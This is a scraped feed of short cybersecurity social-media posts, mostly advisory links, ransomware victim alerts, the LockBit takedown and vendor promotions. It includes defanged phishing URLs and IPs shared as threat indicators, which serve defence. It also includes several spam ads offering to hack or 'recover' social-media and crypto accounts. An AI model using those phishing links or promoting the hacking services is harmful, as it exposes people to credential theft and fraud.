CISA: CISA, EPA, and FBI Release Top Cyber Actions for Securing Water Systems - redpacketsecurity.com/cisa-c…#CISA #OSINT #ThreatIntel #Cyber -- RedPacketSec
CISA: Mozilla Releases Security Updates for Firefox and Thunderbird - redpacketsecurity.com/cisa-m…#CISA #OSINT #ThreatIntel #Cyber -- RedPacketSec
CISA: Adobe Releases Security Updates for Multiple Products - redpacketsecurity.com/cisa-a…#CISA #OSINT #ThreatIntel #Cyber -- RedPacketSec
CISA: CISA Releases One Industrial Control Systems Advisory - redpacketsecurity.com/cisa-c…#CISA #OSINT #ThreatIntel #Cyber -- RedPacketSec
CISA: Microsoft Releases Security Updates for Multiple Products - redpacketsecurity.com/cisa-m…#CISA #OSINT #ThreatIntel #Cyber -- RedPacketSec
CISA: CISA Adds Two Known Exploited Vulnerabilities to Catalog - redpacketsecurity.com/cisa-c…#CISA #OSINT #ThreatIntel #Cyber -- RedPacketSec
CISA: CISA and MS-ISAC Release Advisory on Compromised Account Used to Access State Government Organization - redpacketsecurity.com/cisa-c…#CISA #OSINT #ThreatIntel #Cyber -- RedPacketSec
A rare collaboration of international police agencies ( #Europol, #NCA, #FBI) brought down the infamous #Lockbit #ransomware gang.#CyberSecurity #infosec #cybercrimebuff.ly/42K9iVZ -- twelvesec
#threathunting #cybersecurity #threatintelhorizon3.ai/connectwise-scre… -- CyberShieldCom
#threathunting #cybersecurity #threatintelteam-cymru.com/post/continuo… -- CyberShieldCom
En #VillaClaraconTodos @CITMAVCL continúa preparando ahora a organismos y empresas en todas las Politicas Rectoras #CTI #MA #GD #PI #NMC e #IA #YoRindoCuentas #Porun26deVictorias @Colina_VClara @MilaxyA @ElbaRosaPM @EdMartDiaz @citmacuba @SergueyMartin @i -- MariaC_Velasco
91% of orgs are threatened by #SocialEngineering. Empower your team to defend: baisecurity.net/social-engin…#securityawareness #phishing #vishing #breachprevention #firewalls #endpointsecurity #securityassessment #itsecurity #informationsecurity #security -- BAI_Security
Research by @proofpoint identified #Microsoft #Azure environment as #phishing targets. @rogeragrimes of @KnowBe4 just wrote a book on the topic & this by @AdaptiveShield underscores the fact that firms often forget about securing their cloud environments -- benrothke
I managed to extract and compile i-Soon (aka Anxun) IOCs from the screenshots of the documents. Thanks to @BushidoToken @AzakaSekai_ @RussianPanda9xxStay informed and stay safe.#ISOON #IOC #CTI #Leaks #threatintelligence #CyberSecurity -- ctiyeewesley
#threathunting #cybersecurity #threatintelthehackernews.com/2024/02/ne… -- CyberShieldCom
#threathunting #cybersecurity #threatintelbleepingcomputer.com/news/se… -- CyberShieldCom
cnaomocftxw3wh7gyyct5kpf3rct… #security #cybercrime #malware #CyberSecurity #CybersecurityNews #CyberSecurityAwareness #cyberattacks #CyberSec #threatintel #DarkWeb -- dancho_danchev
📢 Dashlane Phishing Alerts are now available for Android! By using machine learning, Android Phishing alerts will appear in the autofill section of the keyboard to let users know when a site is unsafe. 📱#Phishing #Cybersecurity #Android #MachineLearning # -- dashlane
⚠️ Our #FortiGuardLabs team recently uncovered "TicTacToe Dropper," a sophisticated #malware distribution strategy. This multi-layered threat is distributed via #phishing emails and cloaks its malicious payloads to evade defenses. 🎣 ftnt.net/6010njLgu @in -- FortiGuardLabs
Estoy disponible las 24 horas del día, los 7 días de la semana.Envíame un correo electrónico#hackeado #facebookdown #whatsapp #hackedinstagram #twitterdown #lockedaccount #metamask #ransom#phishing -- Gary_McKinnon00
"PyPIを悪用した攻撃グループLazarusのマルウェア拡散活動" published by JPCERT. #PyPI, #Comebacker, #BLINDINGCAN, #CTI, #OSINT, #LAZARUS blogs.jpcert.or.jp/ja/2024/0… -- lazarusholic
I retrieve all Hacked Snapchat inbox now for guide on how to recover your Account#hacking #snapchatdown #5G #icloud #SNAPCHATLEAKED#phishing #Phish #Hackedgmail #hackedinstagram -- makaveli18049
The #Internet does so much for learning and collaboration in schools. But, it's also home to #malware, #phishing, and #cyberbullying. Here's a checklist of what your #K12district can do to stay safe online: hubs.ly/Q02kMshP0 -- managedmethods
CISA: CISA, EPA, and FBI Release Top Cyber Actions for Securing Water Systems - redpacketsecurity.com/cisa-c…#CISA #OSINT #ThreatIntel #Cyber -- RedPacketSec
On this special 50th episode of DISCARDED, Katie Nickels joins Selena and Crista to discuss a wide array of topics, ranging from #career growth in #threatintel to the intricacies of attribution and threat actor naming.Stream on your favorite platform! ow. -- threatinsight
Too little, very late. "The UK, France and allied countries on Tuesday called for international guidelines for the responsible use of spyware, in an effort to stop the hacking tools from running rampant." #privacy #surveillance #AIEthics #cybersecurityp -- CarissaVeliz
What #cybersecurity topics can we expect in 2024? Take a listen to our recent podcast episode where we discuss some of the predictions CIS experts have shared. bit.ly/3tSB9q0 #ai #zerotrust -- CISecurity
This week's #cybersecurityinsights features Arthur Lozinski with our host Steve King, CISM, CISSPCatch the complete discussion by tuning in to the episode at: cybered.io/podcast/technolog…#technologyassetmanagement #cyberattack #cybersecurity #cybersecuri -- CyberedIo
#threathunting #cybersecurity #threatintelbleepingcomputer.com/news/se… -- CyberShieldCom
Lees meer in dit blogartikel over hoe u een veilige IT-infrastructuur creëert die fungeert als een stevige ruggengraat voor uw slimme fabriek: okt.to/QWMTg6#Manufacturing#Cybersecurity#PlatformDIGITAL -- digitalrealtyNL
Microsoft Purview Insider Risk Management and Microsoft Purview Information Protection help NTT Communications strengthen its #cybersecurity posture against external attacks. Get the story. @msftsecurity stuf.in/bdeth3 -- Dkimble_95
-ランサムウェア攻撃 アラート-公開日時: 2024-02-21被害企業: ​Marchassociates​ランサムグループ: bianlian#Cybersecurity #サイバーセキュリティ #Ransomware #ランサムウェア1708531812 -- IntelVictims
-ランサムウェア攻撃 アラート-公開日時: 2024-02-21被害企業: ​HRTec Inc​ランサムグループ: bianlian#Cybersecurity #サイバーセキュリティ #Ransomware #ランサムウェア1708531802 -- IntelVictims
Employees prevented Musk from breaking federal Twitter order, FTC finds  Detroit News dlvr.it/T33ZdD #CyberSecurity #InfoSec #SecurityInsights -- iSecurity
Malicious documents may be down, but they're not out. In this video, we'll look at how a technique known as template injection is used to deliver macro-enabled content 👇piped.video/5PR15ithJekAnd in a case of strange timing, this document delivers #lockbi -- jstrosch
🚨 Augmentation des attaques ransomware et BEC ! Les demandes de rançon atteignent 600 000$ en moyenne. Secteurs juridique, gouvernemental, retail et énergie parmi les plus touchés. Est-ce que votre entreprise est prête ? 🛡️💻 #Cybersécurité #Ransomware #Pr -- le_vpn_france
Hackers are ramping up ransomware & BEC attacks, with legal & government sectors hit hardest. 🛡️💻 Stay vigilant & secure your data with strong encryption & protocols. #CyberSecurity #Ransomware #DataProtection 😷🔐 -- LeVPN
Developers continue to be targeted with fake job interviews and malicious #GitHub repositories.#malware #npm #SoftwareDevelopment #opensource #javascriptblog.phylum.io/smuggling-mal… -- Phylum_IO
Our @sansforensics Cyber Threat Intelligence presentations are now up on YouTube! Check them out! piped.video/@SANSForensics/v… #ThreatIntel #CTISummit -- rickhholland
Could this be the year for many on-premises businesses to move to the cloud? Experts including VAI EVP Joe Scioscia share thoughts on cloud #ERP deployments, #AI, and #cybersecurity@CIOdiveow.ly/tQEz50QGbLb#clouderp #erpsoftware -- VAIsoftware
Operation Cronos: How they takedown #Lockbit #Ransomware. Who are the hackers arrested. piped.video/1NWkETgYGEk -- SecNews_GR
Offering the best recovery services.And media accounts hacking, Infiltration, and recovery.#hackedinstagram #TwitterDown #lockedaccount #metamask #ransomware #gmailhack #gmaildown #hacked#Hacking #hackaccount #Facebook #hacked #coinbasesupport -- willamson477
强制密码过期是有助于还是损害您的密码安全性?#DataSecurity #Privacy#100DaysOfCode #CloudSecurity#MachineLearning #Phishing #Ransomware #Cybersecurity #CyberAttack #DataProtection#DataBreach #Hacked #Infosec -- _globalhacks
What complaint do you have?? Account #Hacked? Wrong Password??? Lost account?? #Fidelity #Nutmeg #eToro #ActivisionEtc.#Ameritrade #Ellevest #Acorns #CoinbaseWallet #ZenGo #phishing #dataprivacy #cyberattack #pentesting #databreach #ransomware #cloudsecur -- ALICEOLIVIA085
What complaint do you have?? Account #Hacked? Wrong Password??? Lost account?? #Fidelity #Nutmeg #eToro #ActivisionEtc.#Ameritrade #Ellevest #Acorns #CoinbaseWallet #ZenGo #phishing #dataprivacy #cyberattack #pentesting #databreach #ransomware #cloudsecur -- ALICEOLIVIA085
🧑‍💼 SOC Interview QuestionsA repo of SOC interview questions covering:* Networking* Malware analysis* Event log analysis* Threat intelligenceBy @LetsDefendIO#cybersecurity #blueteamgithub.com/LetsDefend/SOC-In… -- clintgibler
The Invisible Threat of Deepfake Phishing buff.ly/3MLeceE #EmergingTech #Cybersecurity #CyberCrime #Deepfake #Phishing #Technology #CISO #Smishing #Cyber #Hacker #Ransomware #Malware #AI #Coruzant #InclusionCloud -- Coruzant
Wyze camera breach allowed 13,000 people to spy on strangers⤵️#Wyze #databreach #privacy #IoT #datasecurity #infosec #cybersecuritycybernews.com/news/wyze-came… -- CyberNews
Peer learning across borders: AFI members from the LAC region are in Luxembourg to discuss challenges in #inclusivegreenfinance and #cybersecurity. #financialinclusion In collaboration with: @uni_lu, @LuxDev_HQ, @The_LHoFT, @AdaMicrofinance, @e_MFP -- NewsAFI
#SextortionAwareness #OnlineSafety #CyberSecurity #ReportFraud -- PP_Hoshiarpur
Mustang Panda Targets Asia with Advanced PlugX Variant DOPLUGSthehackernews.com/2024/02/mu…#Infosec #Security #Cybersecurity #CeptBiro #MustangPanda #Asia #PlugX #DOPLUGS -- ReneRobichaud
If you #need #Help #recovering any Account, Mails, Tiktok, Snapchat, Instagram etc.I'm available for assistance#hacked #facebookdown #whatsapp #hackedinstagram #twitterdown #lockedaccount #metamask #ransomware #alterworld -- _globalhacks
I can’t stop laughing 😆 #infosec #cybersecurity #pentesting #redteam #informationsecurity #CyberSec #networking #networksecurity #infosecurity #cyberattacks #security #linux #cybersecurityawareness #bugbounty #bugbountytips -- _ZeroSecurity_
🚨 It's LIVE DEMO DAY! Register at bit.ly/3T3EQCX then catch the live demo at 10 AM PT / 1 PM ET. Join @BanyanSecurity @SonicWall to learn about protecting your workforce with secure access to corporate assets and infrastructure. #ztna #sse #cybersecurity -- BanyanSecurity
#DEX223 is a truly a gem! 🔥Super impressed with its features ensuring no more losses!The strong cybersecurity and security background give me confidence!keeping our trades safe! #DEX223 #Cybersecurity #Web3 -- bit_bliss
Excitement fills the air as a crowd gathers for our opening day! It's heartwarming to witness such a turnout this year. 😊 #FirstDayJoy #CommunityGathering #ConFoo #TechEvent #WebDev #coding #cybersecurity #innovation #ai #artificialintelligence #technolog -- confooca
Cralyn Technology Solutions recommends this @HPE article, which provides a #cybersecurity #checklist for you to stay 3 steps ahead of bad actors. stuf.in/bderlv -- cralyntech
Você precisa de um Hacker para o seu DM de serviço agora muito confiável #DataScience #Cybersecurity Para #Snapchat #WhatsApp #TikTok #Instagram Hacking ou Recuperação Dm -- CYBER_REPORT911
#threathunting #cybersecurity #threatintelinfosecurity-magazine.com/ne… -- CyberShieldCom
The latest from @DATSProject: Approaching mainnet launch, final testnet phase ongoing. A new scoring system on their desktop software enables participants to track contributions and referrals, earning points along the way.🌟Exciting times for contributors! -- DrSpriggan
#SabíasQue Los tipos de malware más peligrosos para Android son el #ransomware, los troyanos bancarios, y los RAT, aunque no son los únicos 👀¿Quieres saber más? Ingresa a WLS ⏬eset.la/3PbyDAL -- ESETLA
BlackBasta #ransomware group has added DasTeam Ag (dasteam.ch) to their victim list.#Switzerland#BlackBasta #cti #darkweb #databreach #cyberattack -- FalconFeedsio
What complaint do you have?? Account #Hacked? Wrong Password??? Lost account?? #Fidelity #Nutmeg #eToro #ActivisionEtc.#Ameritrade #Ellevest #Acorns #CoinbaseWallet #ZenGo #phishing #dataprivacy #cyberattack #pentesting #databreach #ransomware #cloudsecur -- hacker0xx
What complaint do you have?? Account #Hacked? Wrong Password??? Lost account?? #Fidelity #Nutmeg #eToro #ActivisionEtc.#Ameritrade #Ellevest #Acorns #CoinbaseWallet #ZenGo #phishing #dataprivacy #cyberattack #pentesting #databreach #ransomware #cloudsecur -- hacker0xx
8 strange ways employees can (accidently) expose data#DataSecurity #Privacy #100DaysOfCode #CloudSecurity#MachineLearning #Phishing #Ransomware #Cybersecurity#CyberAttack #DataProtection #DataBreach #Hacked #Infosec -- hacker0xx
【イオンウォレット】認証完了のお知らせ等の件名で、イオンカードを騙る #フィッシングメール。hxxps://𝖺𝖾𝗈𝗇-𝗇𝖾-𝗃𝗉.𝗐𝗃𝗏𝗃𝖼𝖽.𝖼𝗇/?3p0c2bt9(=hxxps://aeon-ne-jp.wjvjcd.cn/?3p0c2bt9)(引数必須)(→…)等 #フィッシングサイト 注意。Cloudflare CDN#Phishing #フィッシング詐欺 -- harugasumi
#2(2/2)hxxps://www.ibsqnkb.cn/hxxps://www.ihfikmc.cn/hxxps://www.jciqgfs.cn/hxxps://www.jitunzn.cn/hxxps://www.klvlmpm.cn/hxxps://www.konjxwd.cn/hxxps://www.kowqlrk.cn/hxxps://www.kpmhfuf.cn/hxxps://www.ougurqf.cn/hxxps://www.syqhmpd.cn/以上#Phishing #フィッシン -- harugasumi
Oggi vi parlo di un argomento controverso, una storia articolata che inizia addirittura nel 2015.Scaricare #TEMU è pericoloso? Cosa si rischia? E soprattutto, ne vale la pena? LINKpiped.video/YXSwGn3GEPk#storytelling #shoppingonline #malware #aliexpress # -- hoppi_pollo
⚠️ Are you SURE you have all your cybersecurity bases covered? Learn how phishing simulations and security awareness training are becoming more crucial aspects of cyber insurance policies in our latest blog: hubs.la/Q02lHXg70#IRONSCALES #phishing #securit -- IRONSCALES
Çevrimiçi Çocuk projemiz kapsamında hazırladığımız videomuzda, siber tuzaklarla mücadelede herkesin bilmesi gereken 10 altın kuralı izliyoruzpiped.video/watch?v=ja6I9uLI…#SiberTuzak #Güvenlik #DataGüvenliği #SiberGüvenlik #OnlineDolandırıcılık #SiberSuçla -- ISOC_TR
"Threat Actor Profile: ScarCruft / APT37" published by SOCRadar. #ScarCruft, #CTI, #OSINT, #LAZARUS socradar.io/threat-actor-pro… -- lazarusholic
"To Russia With Love: Assessing a KONNI-Backdoored Suspected Russian Consular Software Installer" published by DCSO. #Konni, #CTI, #OSINT, #LAZARUS medium.com/@DCSO_CyTec/to-ru… -- lazarusholic
#DataSecurity #Privacy#100DaysOfCode #CloudSecurity#MachineLearning #Phishing#Ransomware #Cybersecurity #CyberAttack #DataProtection#DataBreach #Hacked #Infosec -- Preytech_
This repository can be used to capture the function name, its parameters and also the return value of a Windows function that is called by a Golang application🕵️‍♂️​github.com/leandrofroes/gftr…#infosec #cybersecurity #golang #windows #dfir #threatintel -- r1cksec
It looks like Putin is reviving the KGB playbook- covert ops, espionage, blackmail and compromising assets through Europe are just the tip of the iceberg- the GRU's tactics are as cunning as they are clandestine. #KGB #GRU #geopolitics #threatintel #USAft -- Robert4787
Stay ahead of the curve with the latest insights from @Pure Storage on security trends and predictions for the future! 🔒💡 Explore the evolving landscape of #cybersecurity and ensure your organization is prepared for what's to come. stuf.in/bderl5 -- Soccour1
Wurde grad zu Mutti/Vati erklärt, das Handy vom Töchterlein hätte einen Wsserschaden, ich solle doch mal die Whatsap-Nr. rüberwachsen lassen.Irgendwo sitzt jetzt so nen Dummbeidel, kratzt sich am Kopf, und fragt sich was Muldehaaf, Latzgalli & Dilldappes -- Stefan48772998
Thanks to @TechTimes_News for recognizing us in the Top 5 Best #SIEM Solutions 2024. This reflects our dedication to cutting-edge cybersecurity. Grateful for the honor! 🏆🌐Full article 👉 ow.ly/26zr50QG3Z6#CyberSecurity #OpenSource -- wazuh
43.129.174.41#2(2/2)hxxps://configuredsad-dasdasddyour.sexidude.com/hxxps://configuredsad-dasdasddyour.wikaba.com/hxxps://configuredsad-dasdasddyour.yourtrap.com/※末尾の1URLだけ、現在は204.16.169.54に変わってます。#Phishing #フィッシング詐欺 -- harugasumi
43.129.174.41#2(1/2)hxxps://configuredsad-dasdasddyour.jungleheart.com/hxxps://configuredsad-dasdasddyour.longmusic.com/hxxps://configuredsad-dasdasddyour.onedumb.com/hxxps://configuredsad-dasdasddyour.organiccrap.com/#Phishing #フィッシング詐欺 -- harugasumi
43.129.174.41→現在204.16.169.54 #1(2/2)hxxps://requireddsa-dasinformation.onedumb.com/hxxps://requireddsa-dasinformation.wikaba.com/hxxps://requireddsa-dasinformation.youdontcare.com/hxxps://requireddsa-dasinformation.yourtrap.com/#Phishing #フィッシング詐欺 -- harugasumi
43.129.174.41#1(1/2)※現在は204.16.169.54でERR_SSL_PROTOCOL_ERRORhxxps://requireddsa-dasinformation.jungleheart.com/hxxps://requireddsa-dasinformation.longmusic.com/hxxps://requireddsa-dasinformation.mefound.com/#Phishing #フィッシング詐欺 -- harugasumi
【重要】イオンカードからの重要なセキュリティ更新イオンカードを騙る #フィッシングメール。hxxps://spider-b2nj-tw46.qoxc5rau.workers.dev→hxxps://requireddsa-dasinformation.youdontcare.com/(引数不要)等 #フィッシングサイト 注意virustotal.com/gui/ip-addres…#Phishing #フィッシング詐欺 -- harugasumi
Interview mit Cybeready – Welche Rolle spielt die Schulung von Mitarbeitern bei der Cybersecurity? @CybeReadyDACH #Cybersecurity #ITSecurity #KMU #Malware #Phishing #PhishingSimulation #Security #SecurityAwareness #SecurityAwarenessSchulung #SecurityAware -- netzpalaver
Get an Email Risk Assessment and OPSWAT experts will help your business detect #phishing, #malware, and exploits that bypass your Microsoft 365 #emailsecurity. 🛡️ Sign up today. hubs.la/Q02lHwrc0 -- OPSWAT
Phishing attacks are among the chief causes of security breaches for businesses and organizations worldwide.Sign up to our newsletter today by clicking this link: mailchi.mp/supportlinktech/s…#SupportLinkTech #SupportLinkTechnologies #Phishing #DataBackUp -- SupportLinkTech
#ThreatProtection #CreditSaison users targeted with a new #phishing wave. Read more: broadcom.com/support/securit… -- threatintel
Cybersecurity career success isn't about rushing through 300 hours of study in record time. It's about quality over quantity.Dedicate consistent time, focus, and continuous learning to build a solid foundation (~90 days). Thanks: @BowTiedCyber#cybersecuri -- allenharper
Proliferen els casos de #phishing amb targetes de crèdit. Per fer front a aquesta estafa digital s'estan aplicant mesures diverses:@anc_ad @GovernAndorra @Andorra_Digitalanc.ad/cinc-maneres-devitar-… -- anc_ad
📢Dużo i głośno mówi się o atakach typu #ransomware. Sprawmy wspólnie żeby równie szeroko rozniosła się informacja o tym, że dla oprogramowania #Lockbit 3.0 istnieje już skuteczny dekryptor. Znajdziecie go tutaj➡ nomoreransom.org/pl/decrypti… -- CERT_Polska
Carolina García: "Las copias de seguridad inmutables ofrecen una sólida defensa contra el #ransomware, ya que garantizan siempre una copia de seguridad impecable disponible, evitando así pérdidas de datos irremplazables". @IBM_ES#Cyber24IDCFoundry@Foundry -- CSOspain
#threathunting #cybersecurity #threatintelthehackernews.com/2024/02/ne… -- CyberShieldCom
#threathunting #cybersecurity #threatintelhelpnetsecurity.com/2024/02/… -- CyberShieldCom
Interesting analysis. #China #MPS #threatintel -- Dhanesh_Dodia
#ESET Forscher haben eine #Psyops-Kampagne namens „Operation Texonto“ einer bisher unbekannten russischen Hackergruppe gegen Ukrainer aufgedeckt. Dabei wurden Emails zur #Desinformation und zum #Phishing verschickt.👉 eset.com/de/about/presse/pre…#WeLiveSe -- ESET_de
8BASE #ransomware has added 3 new victims to their #darkweb portal.- Acies Srl 🇮🇹- Axel Johnson 🇸🇪- Helical Technology 🇬🇧#Italy #Sweden #UK#DeepWeb #CyberRisk #8base #CTI -- FalconFeedsio
Forensic Investigation : Prefetch Filehackingarticles.in/forensic-…#infosec #cybersecurity #pentesting #redteam #informationsecurity #CyberSec #networking #networksecurity #infosecurity #cyberattacks #security #linux #cybersecurityawareness #bugbounty #bu -- hackinarticles
Il est important de bien choisir sa messagerie ! Mailo protège ses utilisateurs en plaçant les mails de phishing dans les "Indésirables" mais restez toujours vigilants. #cybersecurite #phishing #messagerienumerama.com/cyberguerre/163… -- HelloMailo
First word on your mind when someone says "Threat Intelligence"#threatintel #CyberSecurity -- ich_rish99
🔒 Don't let mobile security threats catch you off guard! 📱🛡️Stay vigilant and follow these tips to safeguard your mobile devices from potential threats!#MobileSecurity #StaySafeOnline #Cybersecurity #Cloudsecurity #ZeroTrust #ZTNA #InstaSafe -- InstaSafe
Biden to Issue Executive Order Raising Maritime Cybersecurity  BankInfoSecurity.com dlvr.it/T32jnR #SecurityInsights #CyberSecurity #InfoSec -- iSecurity
Biden to sign executive order on US port cybersecurity targeting Chinese-manufactured shipping cranes  NBC Chicago dlvr.it/T32jnJ #SecurityInsights #CyberSecurity #InfoSec -- iSecurity
Biden to create cybersecurity standards for nation's ports as concerns grow over vulnerabilities  Quartz dlvr.it/T32jnB #SecurityInsights #CyberSecurity #InfoSec -- iSecurity
#Phishing #クロネコヤマト IP:191.101.104.197(AS 47583 / Hostinger International Limited )hxxps://kuronekoyamato-japan.jp -- KesaGataMe0
#Phishing #mercari #メルカリ IP:154.82.75.83(AS 399077 / TERAEXCH )hxxps://www.pznjqvt.cn/ -- KesaGataMe0
Yesterday the UK National Crime Agency swooped on LockBit, as part of a cyber security operation by police authorities across eleven countries: lineal.co.uk/lockbit-taken-o… #cyber #security #uk #ransomware -- LinealSoftware
Graag even uw IBAN en BIC code posten. Dat gaat helpen. Eventueel ook uw debitkaartnummer met PIN. #phishing -- PieterLoman
Hunters International Ransomware Victim: Charles Trent - redpacketsecurity.com/hunter…#HuntersInternational, #darkweb, #databreach, #ransomware, #threatintel, #tor -- RedPacketSec
Hunters International Ransomware Victim: Gallup McKinley County Schools - redpacketsecurity.com/hunter…#HuntersInternational, #darkweb, #databreach, #ransomware, #threatintel, #tor -- RedPacketSec
All social media accounts hacking, Infiltration, and recovery #hackedinstagram #TwitterDown #lockedaccount #metamask #ransomware#gmailhack #gmaildown #hacked #Hacking #hackaccount #Facebook #hacked #coinbasesupport #walletphrase #socailmedia. -- ryptoKing
Mkurugenzi Mtendaji wa #CTI, Bw. Leodegar Tenga ametangaza rasmi siku itakayofanyika Maonesho ya Kimataifa ya Wazalishaji Tanzania (TIMEXPO 2024) katika mkutano na waandishi wa habari uliofanyika jana kwenye viwanja vya Saba Saba, jijini Dar es Salaam. #T -- TanzaniaCTI
Don't take the bait! 🎣 Phishing attacks are on the rise, but you can protect yourself. Here's how you can #fighthephish: buff.ly/3HJNtNO#cybersecurity #phishing -- ThreatInt
Gen AI-fueled #cyberattacks pushed remediation costs in 2023 buff.ly/4935Rfv@CSOonline #cybercrime #cyberthreats #cyberattacks #databreaches #AI #genAI #generativeAI #LLM #malware #phishing #ArtificialIntelligence #business #leaders #leadership #CISO #CIO -- Transform_Sec
#LockBit #ransomware -- vmiss33